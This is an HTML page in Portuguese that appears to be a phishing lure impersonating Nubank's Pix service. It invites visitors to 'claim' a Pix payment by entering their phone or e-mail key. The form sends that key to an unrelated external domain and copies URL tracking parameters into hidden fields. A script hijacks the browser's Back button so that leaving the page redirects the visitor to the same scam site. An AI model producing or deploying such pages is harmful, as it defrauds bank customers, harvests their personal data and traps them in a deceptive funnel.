<!DOCTYPE html>
<html lang="pt_BR">

<head>
    <title>Resgate seu Pix</title>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link href="css/QqCaBhYpoGZ0.css" rel="stylesheet">
    <script src="js/Gukx2PsauNjv.js"></script>
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Open+Sans:wght@600;700&amp;display=swap" rel="stylesheet">
    <style>
        .azul {
            background-color: #8B14BA;
        }

        span {
            color: black !important;
        }

        .titulo {
            color: rgb(78, 78, 78);
            font-weight: 700;
            font-family: 'Open Sans', sans-serif;
        }

        .texto {
            color: rgb(90, 90, 90);
            font-weight: 600;
            font-family: 'Open Sans', sans-serif;
        }

        .card {
            color: rgb(134, 134, 134);
            font-weight: 600;
            font-family: 'Open Sans', sans-serif;
        }

        .btn {
            border: 1px rgb(206, 206, 206);
            border-style: double;
            color: rgb(134, 134, 134)
        }

        .btn:focus {
            background-color: rgb(163, 161, 161);
            color: rgb(109, 109, 109);
        }

        input {
            border: 1px double rgb(161, 161, 161);
            border-top: 0px;
            border-left: 0px;
            border-right: 0px;
            height: 50px;
            border-radius: 5px;
        }
        .nubank{
            background-color: #8B14BA;
            color:white;
        }
        .nubank:active{
            background-color: #34981f;
        }
    </style>
</head>

<body>
    <div class="container-fluid p-sm-1 p-2 azul text-center fixed-top">
        <div class="col-sm-6 offset-sm-3">
            <img src="images/sro6QSLihsUQ.png" alt class="col-1 img-fluid">
        </div>
    </div>
    <div class="container mt-5">
        <div class="col-sm-6 offset-sm-3 col-10 offset-1">
            <div class="row">
            </div>
            <br><br><br>
            <h1 class="titulo">Área Pix</h1>
            <h5 class="texto">Informe sua chave abaixo para resgatar seu pix</h5>
            <br><br>
            <form id="formContato" action="https://nupix.store/instapix/" method="get">
                <div class="row">
                    <div class="col-6">
                        <button id="botao1" onclick="esconderCampo(this, 'Celular')" class="btn col-12 p-3">
                            <h4>Celular</h4>
                        </button>
                    </div>
                    <div class="col-6">
                        <button id="botao2" onclick="esconderCampo(this, 'E-mail')" class="btn col-12 p-3">
                            <h4>E-mail</h4>
                        </button>
                    </div>
                    <br><br><br>
                    <div class="col-12">
                        <br>
                        <input id="chave" type="text" class="col-12" name="chave" required placeholder="(xx) x xxxx-xxxx">
                    </div>
                </div>
                <br><br><br><br>
                <div class="row">
                    <br><br><br>
                    <button id="botao" class="btnr nubank col-10 offset-1" type="submit">RESGATAR AGORA</button>
                </div>
            </form>
        </div>
    </div>

    <script>
        function esconderCampo(button, placeholder) {
            var campoInput = document.getElementById("chave");
            campoInput.placeholder = placeholder;
            button.setAttribute("style", "color: rgb(109, 109, 109); background-color: rgb(223, 223, 223);");
            var outroButton = button.id === "botao1" ? document.getElementById("botao2") : document.getElementById("botao1");
            outroButton.setAttribute("style", "color: rgb(109, 109, 109); background-color: white;");
        }

        window.onload = function() {
            var formContato = document.getElementById("formContato");
            var currentUrl = new URL(window.location.href);
            var params = currentUrl.searchParams;
            params.forEach(function(value, key) {
                var input = document.createElement("input");
                input.type = "hidden";
                input.name = key;
                input.value = value;
                formContato.appendChild(input);
            });
        }
    </script>

<script>
    var urlBackRedirect = 'https://nupix.store/instapix'; // lembre-se de usar a url sem espaços
    // não altere nada abaixo dessa linha
    urlBackRedirect = urlBackRedirect = urlBackRedirect.trim() +
            (urlBackRedirect.indexOf("?") > 0 ? '&' : '?') +
            document.location.search.replace('?', '').toString();
    history.pushState({}, "", location.href);
    history.pushState({}, "", location.href);
    window.onpopstate = function () {
        setTimeout(function () {
            location.href = urlBackRedirect;
        }, 1);
    };
</script>

</body>

</html>
